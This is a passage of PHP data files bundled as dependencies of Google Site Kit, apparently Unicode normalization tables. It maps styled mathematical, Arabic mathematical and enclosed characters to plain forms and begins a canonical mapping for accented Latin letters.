'𝓡' => 'R', '𝓢' => 'S', '𝓣' => 'T', '𝓤' => 'U', '𝓥' => 'V', '𝓦' => 'W', '𝓧' => 'X', '𝓨' => 'Y', '𝓩' => 'Z', '𝓪' => 'a', '𝓫' => 'b', '𝓬' => 'c', '𝓭' => 'd', '𝓮' => 'e', '𝓯' => 'f', '𝓰' => 'g', '𝓱' => 'h', '𝓲' => 'i', '𝓳' => 'j', '𝓴' => 'k', '𝓵' => 'l', '𝓶' => 'm', '𝓷' => 'n', '𝓸' => 'o', '𝓹' => 'p', '𝓺' => 'q', '𝓻' => 'r', '𝓼' => 's', '𝓽' => 't', '𝓾' => 'u', '𝓿' => 'v', '𝔀' => 'w', '𝔁' => 'x', '𝔂' => 'y', '𝔃' => 'z', '𝔄' => 'A', '𝔅' => 'B', '𝔇' => 'D', '𝔈' => 'E', '𝔉' => 'F', '𝔊' => 'G', '𝔍' => 'J', '𝔎' => 'K', '𝔏' => 'L', '𝔐' => 'M', '𝔑' => 'N', '𝔒' => 'O', '𝔓' => 'P', '𝔔' => 'Q', '𝔖' => 'S', '𝔗' => 'T', '𝔘' => 'U', '𝔙' => 'V', '𝔚' => 'W', '𝔛' => 'X', '𝔜' => 'Y', '𝔞' => 'a', '𝔟' => 'b', '𝔠' => 'c', '𝔡' => 'd', '𝔢' => 'e', '𝔣' => 'f', '𝔤' => 'g', '𝔥' => 'h', '𝔦' => 'i', '𝔧' => 'j', '𝔨' => 'k', '𝔩' => 'l', '𝔪' => 'm', '𝔫' => 'n', '𝔬' => 'o', '𝔭' => 'p', '𝔮' => 'q', '𝔯' => 'r', '𝔰' => 's', '𝔱' => 't', '𝔲' => 'u', '𝔳' => 'v', '𝔴' => 'w', '𝔵' => 'x', '𝔶' => 'y', '𝔷' => 'z', '𝔸' => 'A', '𝔹' => 'B', '𝔻' => 'D', '𝔼' => 'E', '𝔽' => 'F', '𝔾' => 'G', '𝕀' => 'I', '𝕁' => 'J', '𝕂' => 'K', '𝕃' => 'L', '𝕄' => 'M', '𝕆' => 'O', '𝕊' => 'S', '𝕋' => 'T', '𝕌' => 'U', '𝕍' => 'V', '𝕎' => 'W', '𝕏' => 'X', '𝕐' => 'Y', '𝕒' => 'a', '𝕓' => 'b', '𝕔' => 'c', '𝕕' => 'd', '𝕖' => 'e', '𝕗' => 'f', '𝕘' => 'g', '𝕙' => 'h', '𝕚' => 'i', '𝕛' => 'j', '𝕜' => 'k', '𝕝' => 'l', '𝕞' => 'm', '𝕟' => 'n', '𝕠' => 'o', '𝕡' => 'p', '𝕢' => 'q', '𝕣' => 'r', '𝕤' => 's', '𝕥' => 't', '𝕦' => 'u', '𝕧' => 'v', '𝕨' => 'w', '𝕩' => 'x', '𝕪' => 'y', '𝕫' => 'z', '𝕬' => 'A', '𝕭' => 'B', '𝕮' => 'C', '𝕯' => 'D', '𝕰' => 'E', '𝕱' => 'F', '𝕲' => 'G', '𝕳' => 'H', '𝕴' => 'I', '𝕵' => 'J', '𝕶' => 'K', '𝕷' => 'L', '𝕸' => 'M', '𝕹' => 'N', '𝕺' => 'O', '𝕻' => 'P', '𝕼' => 'Q', '𝕽' => 'R', '𝕾' => 'S', '𝕿' => 'T', '𝖀' => 'U', '𝖁' => 'V', '𝖂' => 'W', '𝖃' => 'X', '𝖄' => 'Y', '𝖅' => 'Z', '𝖆' => 'a', '𝖇' => 'b', '𝖈' => 'c', '𝖉' => 'd', '𝖊' => 'e', '𝖋' => 'f', '𝖌' => 'g', '𝖍' => 'h', '𝖎' => 'i', '𝖏' => 'j', '𝖐' => 'k', '𝖑' => 'l', '𝖒' => 'm', '𝖓' => 'n', '𝖔' => 'o', '𝖕' => 'p', '𝖖' => 'q', '𝖗' => 'r', '𝖘' => 's', '𝖙' => 't', '𝖚' => 'u', '𝖛' => 'v', '𝖜' => 'w', '𝖝' => 'x', '𝖞' => 'y', '𝖟' => 'z', '𝖠' => 'A', '𝖡' => 'B', '𝖢' => 'C', '𝖣' => 'D', '𝖤' => 'E', '𝖥' => 'F', '𝖦' => 'G', '𝖧' => 'H', '𝖨' => 'I', '𝖩' => 'J', '𝖪' => 'K', '𝖫' => 'L', '𝖬' => 'M', '𝖭' => 'N', '𝖮' => 'O', '𝖯' => 'P', '𝖰' => 'Q', '𝖱' => 'R', '𝖲' => 'S', '𝖳' => 'T', '𝖴' => 'U', '𝖵' => 'V', '𝖶' => 'W', '𝖷' => 'X', '𝖸' => 'Y', '𝖹' => 'Z', '𝖺' => 'a', '𝖻' => 'b', '𝖼' => 'c', '𝖽' => 'd', '𝖾' => 'e', '𝖿' => 'f', '𝗀' => 'g', '𝗁' => 'h', '𝗂' => 'i', '𝗃' => 'j', '𝗄' => 'k', '𝗅' => 'l', '𝗆' => 'm', '𝗇' => 'n', '𝗈' => 'o', '𝗉' => 'p', '𝗊' => 'q', '𝗋' => 'r', '𝗌' => 's', '𝗍' => 't', '𝗎' => 'u', '𝗏' => 'v', '𝗐' => 'w', '𝗑' => 'x', '𝗒' => 'y', '𝗓' => 'z', '𝗔' => 'A', '𝗕' => 'B', '𝗖' => 'C', '𝗗' => 'D', '𝗘' => 'E', '𝗙' => 'F', '𝗚' => 'G', '𝗛' => 'H', '𝗜' => 'I', '𝗝' => 'J', '𝗞' => 'K', '𝗟' => 'L', '𝗠' => 'M', '𝗡' => 'N', '𝗢' => 'O', '𝗣' => 'P', '𝗤' => 'Q', '𝗥' => 'R', '𝗦' => 'S', '𝗧' => 'T', '𝗨' => 'U', '𝗩' => 'V', '𝗪' => 'W', '𝗫' => 'X', '𝗬' => 'Y', '𝗭' => 'Z', '𝗮' => 'a', '𝗯' => 'b', '𝗰' => 'c', '𝗱' => 'd', '𝗲' => 'e', '𝗳' => 'f', '𝗴' => 'g', '𝗵' => 'h', '𝗶' => 'i', '𝗷' => 'j', '𝗸' => 'k', '𝗹' => 'l', '𝗺' => 'm', '𝗻' => 'n', '𝗼' => 'o', '𝗽' => 'p', '𝗾' => 'q', '𝗿' => 'r', '𝘀' => 's', '𝘁' => 't', '𝘂' => 'u', '𝘃' => 'v', '𝘄' => 'w', '𝘅' => 'x', '𝘆' => 'y', '𝘇' => 'z', '𝘈' => 'A', '𝘉' => 'B', '𝘊' => 'C', '𝘋' => 'D', '𝘌' => 'E', '𝘍' => 'F', '𝘎' => 'G', '𝘏' => 'H', '𝘐' => 'I', '𝘑' => 'J', '𝘒' => 'K', '𝘓' => 'L', '𝘔' => 'M', '𝘕' => 'N', '𝘖' => 'O', '𝘗' => 'P', '𝘘' => 'Q', '𝘙' => 'R', '𝘚' => 'S', '𝘛' => 'T', '𝘜' => 'U', '𝘝' => 'V', '𝘞' => 'W', '𝘟' => 'X', '𝘠' => 'Y', '𝘡' => 'Z', '𝘢' => 'a', '𝘣' => 'b', '𝘤' => 'c', '𝘥' => 'd', '𝘦' => 'e', '𝘧' => 'f', '𝘨' => 'g', '𝘩' => 'h', '𝘪' => 'i', '𝘫' => 'j', '𝘬' => 'k', '𝘭' => 'l', '𝘮' => 'm', '𝘯' => 'n', '𝘰' => 'o', '𝘱' => 'p', '𝘲' => 'q', '𝘳' => 'r', '𝘴' => 's', '𝘵' => 't', '𝘶' => 'u', '𝘷' => 'v', '𝘸' => 'w', '𝘹' => 'x', '𝘺' => 'y', '𝘻' => 'z', '𝘼' => 'A', '𝘽' => 'B', '𝘾' => 'C', '𝘿' => 'D', '𝙀' => 'E', '𝙁' => 'F', '𝙂' => 'G', '𝙃' => 'H', '𝙄' => 'I', '𝙅' => 'J', '𝙆' => 'K', '𝙇' => 'L', '𝙈' => 'M', '𝙉' => 'N', '𝙊' => 'O', '𝙋' => 'P', '𝙌' => 'Q', '𝙍' => 'R', '𝙎' => 'S', '𝙏' => 'T', '𝙐' => 'U', '𝙑' => 'V', '𝙒' => 'W', '𝙓' => 'X', '𝙔' => 'Y', '𝙕' => 'Z', '𝙖' => 'a', '𝙗' => 'b', '𝙘' => 'c', '𝙙' => 'd', '𝙚' => 'e', '𝙛' => 'f', '𝙜' => 'g', '𝙝' => 'h', '𝙞' => 'i', '𝙟' => 'j', '𝙠' => 'k', '𝙡' => 'l', '𝙢' => 'm', '𝙣' => 'n', '𝙤' => 'o', '𝙥' => 'p', '𝙦' => 'q', '𝙧' => 'r', '𝙨' => 's', '𝙩' => 't', '𝙪' => 'u', '𝙫' => 'v', '𝙬' => 'w', '𝙭' => 'x', '𝙮' => 'y', '𝙯' => 'z', '𝙰' => 'A', '𝙱' => 'B', '𝙲' => 'C', '𝙳' => 'D', '𝙴' => 'E', '𝙵' => 'F', '𝙶' => 'G', '𝙷' => 'H', '𝙸' => 'I', '𝙹' => 'J', '𝙺' => 'K', '𝙻' => 'L', '𝙼' => 'M', '𝙽' => 'N', '𝙾' => 'O', '𝙿' => 'P', '𝚀' => 'Q', '𝚁' => 'R', '𝚂' => 'S', '𝚃' => 'T', '𝚄' => 'U', '𝚅' => 'V', '𝚆' => 'W', '𝚇' => 'X', '𝚈' => 'Y', '𝚉' => 'Z', '𝚊' => 'a', '𝚋' => 'b', '𝚌' => 'c', '𝚍' => 'd', '𝚎' => 'e', '𝚏' => 'f', '𝚐' => 'g', '𝚑' => 'h', '𝚒' => 'i', '𝚓' => 'j', '𝚔' => 'k', '𝚕' => 'l', '𝚖' => 'm', '𝚗' => 'n', '𝚘' => 'o', '𝚙' => 'p', '𝚚' => 'q', '𝚛' => 'r', '𝚜' => 's', '𝚝' => 't', '𝚞' => 'u', '𝚟' => 'v', '𝚠' => 'w', '𝚡' => 'x', '𝚢' => 'y', '𝚣' => 'z', '𝚤' => 'ı', '𝚥' => 'ȷ', '𝚨' => 'Α', '𝚩' => 'Β', '𝚪' => 'Γ', '𝚫' => 'Δ', '𝚬' => 'Ε', '𝚭' => 'Ζ', '𝚮' => 'Η', '𝚯' => 'Θ', '𝚰' => 'Ι', '𝚱' => 'Κ', '𝚲' => 'Λ', '𝚳' => 'Μ', '𝚴' => 'Ν', '𝚵' => 'Ξ', '𝚶' => 'Ο', '𝚷' => 'Π', '𝚸' => 'Ρ', '𝚹' => 'Θ', '𝚺' => 'Σ', '𝚻' => 'Τ', '𝚼' => 'Υ', '𝚽' => 'Φ', '𝚾' => 'Χ', '𝚿' => 'Ψ', '𝛀' => 'Ω', '𝛁' => '∇', '𝛂' => 'α', '𝛃' => 'β', '𝛄' => 'γ', '𝛅' => 'δ', '𝛆' => 'ε', '𝛇' => 'ζ', '𝛈' => 'η', '𝛉' => 'θ', '𝛊' => 'ι', '𝛋' => 'κ', '𝛌' => 'λ', '𝛍' => 'μ', '𝛎' => 'ν', '𝛏' => 'ξ', '𝛐' => 'ο', '𝛑' => 'π', '𝛒' => 'ρ', '𝛓' => 'ς', '𝛔' => 'σ', '𝛕' => 'τ', '𝛖' => 'υ', '𝛗' => 'φ', '𝛘' => 'χ', '𝛙' => 'ψ', '𝛚' => 'ω', '𝛛' => '∂', '𝛜' => 'ε', '𝛝' => 'θ', '𝛞' => 'κ', '𝛟' => 'φ', '𝛠' => 'ρ', '𝛡' => 'π', '𝛢' => 'Α', '𝛣' => 'Β', '𝛤' => 'Γ', '𝛥' => 'Δ', '𝛦' => 'Ε', '𝛧' => 'Ζ', '𝛨' => 'Η', '𝛩' => 'Θ', '𝛪' => 'Ι', '𝛫' => 'Κ', '𝛬' => 'Λ', '𝛭' => 'Μ', '𝛮' => 'Ν', '𝛯' => 'Ξ', '𝛰' => 'Ο', '𝛱' => 'Π', '𝛲' => 'Ρ', '𝛳' => 'Θ', '𝛴' => 'Σ', '𝛵' => 'Τ', '𝛶' => 'Υ', '𝛷' => 'Φ', '𝛸' => 'Χ', '𝛹' => 'Ψ', '𝛺' => 'Ω', '𝛻' => '∇', '𝛼' => 'α', '𝛽' => 'β', '𝛾' => 'γ', '𝛿' => 'δ', '𝜀' => 'ε', '𝜁' => 'ζ', '𝜂' => 'η', '𝜃' => 'θ', '𝜄' => 'ι', '𝜅' => 'κ', '𝜆' => 'λ', '𝜇' => 'μ', '𝜈' => 'ν', '𝜉' => 'ξ', '𝜊' => 'ο', '𝜋' => 'π', '𝜌' => 'ρ', '𝜍' => 'ς', '𝜎' => 'σ', '𝜏' => 'τ', '𝜐' => 'υ', '𝜑' => 'φ', '𝜒' => 'χ', '𝜓' => 'ψ', '𝜔' => 'ω', '𝜕' => '∂', '𝜖' => 'ε', '𝜗' => 'θ', '𝜘' => 'κ', '𝜙' => 'φ', '𝜚' => 'ρ', '𝜛' => 'π', '𝜜' => 'Α', '𝜝' => 'Β', '𝜞' => 'Γ', '𝜟' => 'Δ', '𝜠' => 'Ε', '𝜡' => 'Ζ', '𝜢' => 'Η', '𝜣' => 'Θ', '𝜤' => 'Ι', '𝜥' => 'Κ', '𝜦' => 'Λ', '𝜧' => 'Μ', '𝜨' => 'Ν', '𝜩' => 'Ξ', '𝜪' => 'Ο', '𝜫' => 'Π', '𝜬' => 'Ρ', '𝜭' => 'Θ', '𝜮' => 'Σ', '𝜯' => 'Τ', '𝜰' => 'Υ', '𝜱' => 'Φ', '𝜲' => 'Χ', '𝜳' => 'Ψ', '𝜴' => 'Ω', '𝜵' => '∇', '𝜶' => 'α', '𝜷' => 'β', '𝜸' => 'γ', '𝜹' => 'δ', '𝜺' => 'ε', '𝜻' => 'ζ', '𝜼' => 'η', '𝜽' => 'θ', '𝜾' => 'ι', '𝜿' => 'κ', '𝝀' => 'λ', '𝝁' => 'μ', '𝝂' => 'ν', '𝝃' => 'ξ', '𝝄' => 'ο', '𝝅' => 'π', '𝝆' => 'ρ', '𝝇' => 'ς', '𝝈' => 'σ', '𝝉' => 'τ', '𝝊' => 'υ', '𝝋' => 'φ', '𝝌' => 'χ', '𝝍' => 'ψ', '𝝎' => 'ω', '𝝏' => '∂', '𝝐' => 'ε', '𝝑' => 'θ', '𝝒' => 'κ', '𝝓' => 'φ', '𝝔' => 'ρ', '𝝕' => 'π', '𝝖' => 'Α', '𝝗' => 'Β', '𝝘' => 'Γ', '𝝙' => 'Δ', '𝝚' => 'Ε', '𝝛' => 'Ζ', '𝝜' => 'Η', '𝝝' => 'Θ', '𝝞' => 'Ι', '𝝟' => 'Κ', '𝝠' => 'Λ', '𝝡' => 'Μ', '𝝢' => 'Ν', '𝝣' => 'Ξ', '𝝤' => 'Ο', '𝝥' => 'Π', '𝝦' => 'Ρ', '𝝧' => 'Θ', '𝝨' => 'Σ', '𝝩' => 'Τ', '𝝪' => 'Υ', '𝝫' => 'Φ', '𝝬' => 'Χ', '𝝭' => 'Ψ', '𝝮' => 'Ω', '𝝯' => '∇', '𝝰' => 'α', '𝝱' => 'β', '𝝲' => 'γ', '𝝳' => 'δ', '𝝴' => 'ε', '𝝵' => 'ζ', '𝝶' => 'η', '𝝷' => 'θ', '𝝸' => 'ι', '𝝹' => 'κ', '𝝺' => 'λ', '𝝻' => 'μ', '𝝼' => 'ν', '𝝽' => 'ξ', '𝝾' => 'ο', '𝝿' => 'π', '𝞀' => 'ρ', '𝞁' => 'ς', '𝞂' => 'σ', '𝞃' => 'τ', '𝞄' => 'υ', '𝞅' => 'φ', '𝞆' => 'χ', '𝞇' => 'ψ', '𝞈' => 'ω', '𝞉' => '∂', '𝞊' => 'ε', '𝞋' => 'θ', '𝞌' => 'κ', '𝞍' => 'φ', '𝞎' => 'ρ', '𝞏' => 'π', '𝞐' => 'Α', '𝞑' => 'Β', '𝞒' => 'Γ', '𝞓' => 'Δ', '𝞔' => 'Ε', '𝞕' => 'Ζ', '𝞖' => 'Η', '𝞗' => 'Θ', '𝞘' => 'Ι', '𝞙' => 'Κ', '𝞚' => 'Λ', '𝞛' => 'Μ', '𝞜' => 'Ν', '𝞝' => 'Ξ', '𝞞' => 'Ο', '𝞟' => 'Π', '𝞠' => 'Ρ', '𝞡' => 'Θ', '𝞢' => 'Σ', '𝞣' => 'Τ', '𝞤' => 'Υ', '𝞥' => 'Φ', '𝞦' => 'Χ', '𝞧' => 'Ψ', '𝞨' => 'Ω', '𝞩' => '∇', '𝞪' => 'α', '𝞫' => 'β', '𝞬' => 'γ', '𝞭' => 'δ', '𝞮' => 'ε', '𝞯' => 'ζ', '𝞰' => 'η', '𝞱' => 'θ', '𝞲' => 'ι', '𝞳' => 'κ', '𝞴' => 'λ', '𝞵' => 'μ', '𝞶' => 'ν', '𝞷' => 'ξ', '𝞸' => 'ο', '𝞹' => 'π', '𝞺' => 'ρ', '𝞻' => 'ς', '𝞼' => 'σ', '𝞽' => 'τ', '𝞾' => 'υ', '𝞿' => 'φ', '𝟀' => 'χ', '𝟁' => 'ψ', '𝟂' => 'ω', '𝟃' => '∂', '𝟄' => 'ε', '𝟅' => 'θ', '𝟆' => 'κ', '𝟇' => 'φ', '𝟈' => 'ρ', '𝟉' => 'π', '𝟊' => 'Ϝ', '𝟋' => 'ϝ', '𝟎' => '0', '𝟏' => '1', '𝟐' => '2', '𝟑' => '3', '𝟒' => '4', '𝟓' => '5', '𝟔' => '6', '𝟕' => '7', '𝟖' => '8', '𝟗' => '9', '𝟘' => '0', '𝟙' => '1', '𝟚' => '2', '𝟛' => '3', '𝟜' => '4', '𝟝' => '5', '𝟞' => '6', '𝟟' => '7', '𝟠' => '8', '𝟡' => '9', '𝟢' => '0', '𝟣' => '1', '𝟤' => '2', '𝟥' => '3', '𝟦' => '4', '𝟧' => '5', '𝟨' => '6', '𝟩' => '7', '𝟪' => '8', '𝟫' => '9', '𝟬' => '0', '𝟭' => '1', '𝟮' => '2', '𝟯' => '3', '𝟰' => '4', '𝟱' => '5', '𝟲' => '6', '𝟳' => '7', '𝟴' => '8', '𝟵' => '9', '𝟶' => '0', '𝟷' => '1', '𝟸' => '2', '𝟹' => '3', '𝟺' => '4', '𝟻' => '5', '𝟼' => '6', '𝟽' => '7', '𝟾' => '8', '𝟿' => '9', '𞸀' => 'ا', '𞸁' => 'ب', '𞸂' => 'ج', '𞸃' => 'د', '𞸅' => 'و', '𞸆' => 'ز', '𞸇' => 'ح', '𞸈' => 'ط', '𞸉' => 'ي', '𞸊' => 'ك', '𞸋' => 'ل', '𞸌' => 'م', '𞸍' => 'ن', '𞸎' => 'س', '𞸏' => 'ع', '𞸐' => 'ف', '𞸑' => 'ص', '𞸒' => 'ق', '𞸓' => 'ر', '𞸔' => 'ش', '𞸕' => 'ت', '𞸖' => 'ث', '𞸗' => 'خ', '𞸘' => 'ذ', '𞸙' => 'ض', '𞸚' => 'ظ', '𞸛' => 'غ', '𞸜' => 'ٮ', '𞸝' => 'ں', '𞸞' => 'ڡ', '𞸟' => 'ٯ', '𞸡' => 'ب', '𞸢' => 'ج', '𞸤' => 'ه', '𞸧' => 'ح', '𞸩' => 'ي', '𞸪' => 'ك', '𞸫' => 'ل', '𞸬' => 'م', '𞸭' => 'ن', '𞸮' => 'س', '𞸯' => 'ع', '𞸰' => 'ف', '𞸱' => 'ص', '𞸲' => 'ق', '𞸴' => 'ش', '𞸵' => 'ت', '𞸶' => 'ث', '𞸷' => 'خ', '𞸹' => 'ض', '𞸻' => 'غ', '𞹂' => 'ج', '𞹇' => 'ح', '𞹉' => 'ي', '𞹋' => 'ل', '𞹍' => 'ن', '𞹎' => 'س', '𞹏' => 'ع', '𞹑' => 'ص', '𞹒' => 'ق', '𞹔' => 'ش', '𞹗' => 'خ', '𞹙' => 'ض', '𞹛' => 'غ', '𞹝' => 'ں', '𞹟' => 'ٯ', '𞹡' => 'ب', '𞹢' => 'ج', '𞹤' => 'ه', '𞹧' => 'ح', '𞹨' => 'ط', '𞹩' => 'ي', '𞹪' => 'ك', '𞹬' => 'م', '𞹭' => 'ن', '𞹮' => 'س', '𞹯' => 'ع', '𞹰' => 'ف', '𞹱' => 'ص', '𞹲' => 'ق', '𞹴' => 'ش', '𞹵' => 'ت', '𞹶' => 'ث', '𞹷' => 'خ', '𞹹' => 'ض', '𞹺' => 'ظ', '𞹻' => 'غ', '𞹼' => 'ٮ', '𞹾' => 'ڡ', '𞺀' => 'ا', '𞺁' => 'ب', '𞺂' => 'ج', '𞺃' => 'د', '𞺄' => 'ه', '𞺅' => 'و', '𞺆' => 'ز', '𞺇' => 'ح', '𞺈' => 'ط', '𞺉' => 'ي', '𞺋' => 'ل', '𞺌' => 'م', '𞺍' => 'ن', '𞺎' => 'س', '𞺏' => 'ع', '𞺐' => 'ف', '𞺑' => 'ص', '𞺒' => 'ق', '𞺓' => 'ر', '𞺔' => 'ش', '𞺕' => 'ت', '𞺖' => 'ث', '𞺗' => 'خ', '𞺘' => 'ذ', '𞺙' => 'ض', '𞺚' => 'ظ', '𞺛' => 'غ', '𞺡' => 'ب', '𞺢' => 'ج', '𞺣' => 'د', '𞺥' => 'و', '𞺦' => 'ز', '𞺧' => 'ح', '𞺨' => 'ط', '𞺩' => 'ي', '𞺫' => 'ل', '𞺬' => 'م', '𞺭' => 'ن', '𞺮' => 'س', '𞺯' => 'ع', '𞺰' => 'ف', '𞺱' => 'ص', '𞺲' => 'ق', '𞺳' => 'ر', '𞺴' => 'ش', '𞺵' => 'ت', '𞺶' => 'ث', '𞺷' => 'خ', '𞺸' => 'ذ', '𞺹' => 'ض', '𞺺' => 'ظ', '𞺻' => 'غ', '🄀' => '0.', '🄁' => '0,', '🄂' => '1,', '🄃' => '2,', '🄄' => '3,', '🄅' => '4,', '🄆' => '5,', '🄇' => '6,', '🄈' => '7,', '🄉' => '8,', '🄊' => '9,', '🄐' => '(A)', '🄑' => '(B)', '🄒' => '(C)', '🄓' => '(D)', '🄔' => '(E)', '🄕' => '(F)', '🄖' => '(G)', '🄗' => '(H)', '🄘' => '(I)', '🄙' => '(J)', '🄚' => '(K)', '🄛' => '(L)', '🄜' => '(M)', '🄝' => '(N)', '🄞' => '(O)', '🄟' => '(P)', '🄠' => '(Q)', '🄡' => '(R)', '🄢' => '(S)', '🄣' => '(T)', '🄤' => '(U)', '🄥' => '(V)', '🄦' => '(W)', '🄧' => '(X)', '🄨' => '(Y)', '🄩' => '(Z)', '🄪' => '〔S〕', '🄫' => 'C', '🄬' => 'R', '🄭' => 'CD', '🄮' => 'WZ', '🄰' => 'A', '🄱' => 'B', '🄲' => 'C', '🄳' => 'D', '🄴' => 'E', '🄵' => 'F', '🄶' => 'G', '🄷' => 'H', '🄸' => 'I', '🄹' => 'J', '🄺' => 'K', '🄻' => 'L', '🄼' => 'M', '🄽' => 'N', '🄾' => 'O', '🄿' => 'P', '🅀' => 'Q', '🅁' => 'R', '🅂' => 'S', '🅃' => 'T', '🅄' => 'U', '🅅' => 'V', '🅆' => 'W', '🅇' => 'X', '🅈' => 'Y', '🅉' => 'Z', '🅊' => 'HV', '🅋' => 'MV', '🅌' => 'SD', '🅍' => 'SS', '🅎' => 'PPV', '🅏' => 'WC', '🅪' => 'MC', '🅫' => 'MD', '🅬' => 'MR', '🆐' => 'DJ', '🈀' => 'ほか', '🈁' => 'ココ', '🈂' => 'サ', '🈐' => '手', '🈑' => '字', '🈒' => '双', '🈓' => 'デ', '🈔' => '二', '🈕' => '多', '🈖' => '解', '🈗' => '天', '🈘' => '交', '🈙' => '映', '🈚' => '無', '🈛' => '料', '🈜' => '前', '🈝' => '後', '🈞' => '再', '🈟' => '新', '🈠' => '初', '🈡' => '終', '🈢' => '生', '🈣' => '販', '🈤' => '声', '🈥' => '吹', '🈦' => '演', '🈧' => '投', '🈨' => '捕', '🈩' => '一', '🈪' => '三', '🈫' => '遊', '🈬' => '左', '🈭' => '中', '🈮' => '右', '🈯' => '指', '🈰' => '走', '🈱' => '打', '🈲' => '禁', '🈳' => '空', '🈴' => '合', '🈵' => '満', '🈶' => '有', '🈷' => '月', '🈸' => '申', '🈹' => '割', '🈺' => '営', '🈻' => '配', '🉀' => '〔本〕', '🉁' => '〔三〕', '🉂' => '〔二〕', '🉃' => '〔安〕', '🉄' => '〔点〕', '🉅' => '〔打〕', '🉆' => '〔盗〕', '🉇' => '〔勝〕', '🉈' => '〔敗〕', '🉐' => '得', '🉑' => '可', '🯰' => '0', '🯱' => '1', '🯲' => '2', '🯳' => '3', '🯴' => '4', '🯵' => '5', '🯶' => '6', '🯷' => '7', '🯸' => '8', '🯹' => '9'); <?php namespace Google\Site_Kit_Dependencies; return array('À' => 'À', 'Á' => 'Á', 'Â' => 'Â', 'Ã' => 'Ã', 'Ä' => 'Ä', 'Å' => 'Å', 'Ç' => 'Ç', 'È' => 'È', 'É' => 'É', 'Ê' => 'Ê', 'Ë' => 'Ë', 'Ì' => 'Ì', 'Í' => 'Í', 'Î' => 'Î', 'Ï' => 'Ï', 'Ñ' => 'Ñ', 'Ò' => 'Ò', 'Ó' => 'Ó', 'Ô' => 'Ô', 'Õ' => 'Õ', 'Ö' => 'Ö', 'Ù' => 'Ù', 'Ú' => 'Ú', 'Û' => 'Û', 'Ü' => 'Ü', 'Ý' => 'Ý', 'à' => 'à', 'á' => 'á', 'â' => 'â', 'ã' => 'ã', 'ä' => 'ä', 'å' => 'å', 'ç' => 'ç', 'è' => 'è', 'é' => 'é', 'ê' => 'ê', 'ë' => 'ë', 'ì' => 'ì', 'í' => 'í', 'î' => 'î', 'ï' => 'ï', 'ñ' => 'ñ', 'ò' => 'ò', 'ó' => 'ó', 'ô' => 'ô', 'õ' => 'õ', 'ö' => 'ö', 'ù' => 'ù', 'ú' => 'ú', 'û' => 'û', 'ü' => 'ü', 'ý' => 'ý', 'ÿ' => 'ÿ', 'Ā' => 'Ā', 'ā' => 'ā', 'Ă' => 'Ă', 'ă' => 'ă', 'Ą' => 'Ą', 'ą' => 'ą', 'Ć' => 'Ć', 'ć' => 'ć', 'Ĉ' => 'Ĉ', 'ĉ' => 'ĉ', 'Ċ' => 'Ċ', 'ċ' => 'ċ', 'Č' => 'Č', 'č' => 'č', 'Ď' => 'Ď', 'ď' => 'ď', 'Ē' => 'Ē', 'ē' => 'ē', 'Ĕ' => 'Ĕ', 'ĕ' => 'ĕ', 'Ė' => 'Ė', 'ė' => 'ė', 'Ę' => 'Ę', 'ę' => 'ę', 'Ě' => 'Ě', 'ě' => 'ě', 'Ĝ' => 'Ĝ', 'ĝ' => 'ĝ', 'Ğ' => 'Ğ', 'ğ' => 'ğ', 'Ġ' => 'Ġ', 'ġ' => 'ġ', 'Ģ' => 'Ģ', 'ģ' => 'ģ', 'Ĥ' => 'Ĥ', 'ĥ' => 'ĥ', 'Ĩ' => 'Ĩ', 'ĩ' => 'ĩ', 'Ī' => 'Ī', 'ī' => 'ī', 'Ĭ' => 'Ĭ', 'ĭ' => 'ĭ', 'Į' => 'Į', 'į' => 'į', 'İ' => 'İ', 'Ĵ' => 'Ĵ', 'ĵ' => 'ĵ', 'Ķ' => 'Ķ', 'ķ' => 'ķ', 'Ĺ' => 'Ĺ', 'ĺ' => 'ĺ', 'Ļ' => 'Ļ', 'ļ' => 'ļ', 'Ľ' => 'Ľ', 'ľ' => 'ľ', 'Ń' => 'Ń', 'ń' => 'ń', 'Ņ' => 'Ņ', 'ņ' => 'ņ', 'Ň' => 'Ň', 'ň' => 'ň', 'Ō' => 'Ō', 'ō' => 'ō', 'Ŏ' => 'Ŏ', 'ŏ' => 'ŏ', 'Ő' => 'Ő', 'ő' => 'ő', 'Ŕ' => 'Ŕ', 'ŕ' => 'ŕ', 'Ŗ' => 'Ŗ', 'ŗ' => 'ŗ', 'Ř' => 'Ř', 'ř' => 'ř', 'Ś' => 'Ś', 'ś' => 'ś', 'Ŝ' => 'Ŝ', 'ŝ' => 'ŝ', 'Ş' => 'Ş', 'ş' => 'ş', 'Š' => 'Š', 'š' => 'š', 'Ţ' => 'Ţ', 'ţ' => 'ţ', 'Ť' => 'Ť', 'ť' => 'ť', 'Ũ' => 'Ũ', 'ũ' => 'ũ', 'Ū' => 'Ū', 'ū' => 'ū', 'Ŭ' => 'Ŭ', 'ŭ' => 'ŭ', 'Ů' => 'Ů', 'ů' => 'ů', 'Ű' => 'Ű', 'ű' => 'ű', 'Ų' => 'Ų', 'ų' => 'ų', 'Ŵ' => 'Ŵ', 'ŵ' => 'ŵ', 'Ŷ' => 'Ŷ', 'ŷ' => 'ŷ', 'Ÿ' => 'Ÿ', 'Ź' => 'Ź', 'ź' => 'ź', 'Ż' => 'Ż', 'ż' => 'ż', 'Ž' => 'Ž', 'ž' => 'ž', 'Ơ' => 'Ơ', 'ơ' => 'ơ', 'Ư' => 'Ư', 'ư' => 'ư', 'Ǎ' => 'Ǎ', 'ǎ' => 'ǎ', 'Ǐ' => 'Ǐ', 'ǐ' => 'ǐ', 'Ǒ' => 'Ǒ', 'ǒ' => 'ǒ', 'Ǔ' => 'Ǔ', 'ǔ' => 'ǔ', 'Ǖ' => 'Ǖ', 'ǖ' => 'ǖ', 'Ǘ' => 'Ǘ', 'ǘ' => 'ǘ', 'Ǚ' => 'Ǚ', 'ǚ' => 'ǚ', 'Ǜ' => 'Ǜ', 'ǜ' => 'ǜ', 'Ǟ' => 'Ǟ', 'ǟ' => 'ǟ', 'Ǡ' => 'Ǡ', 'ǡ' => 'ǡ', 'Ǣ' => 'Ǣ', 'ǣ' => 'ǣ', 'Ǧ' => 'Ǧ', 'ǧ' => 'ǧ', 'Ǩ' => 'Ǩ', 'ǩ' => 'ǩ', 'Ǫ' => 'Ǫ', 'ǫ' => 'ǫ', 'Ǭ' => 'Ǭ', 'ǭ' => 'ǭ', 'Ǯ' => 'Ǯ', 'ǯ' => 'ǯ', 'ǰ' => 'ǰ', 'Ǵ' => 'Ǵ', 'ǵ' => 'ǵ', 'Ǹ' => 'Ǹ', 'ǹ' => 'ǹ', 'Ǻ' => 'Ǻ', 'ǻ' => 'ǻ', 'Ǽ' => 'Ǽ', 'ǽ' => 'ǽ', 'Ǿ' => 'Ǿ', 'ǿ' => 'ǿ', 'Ȁ' => 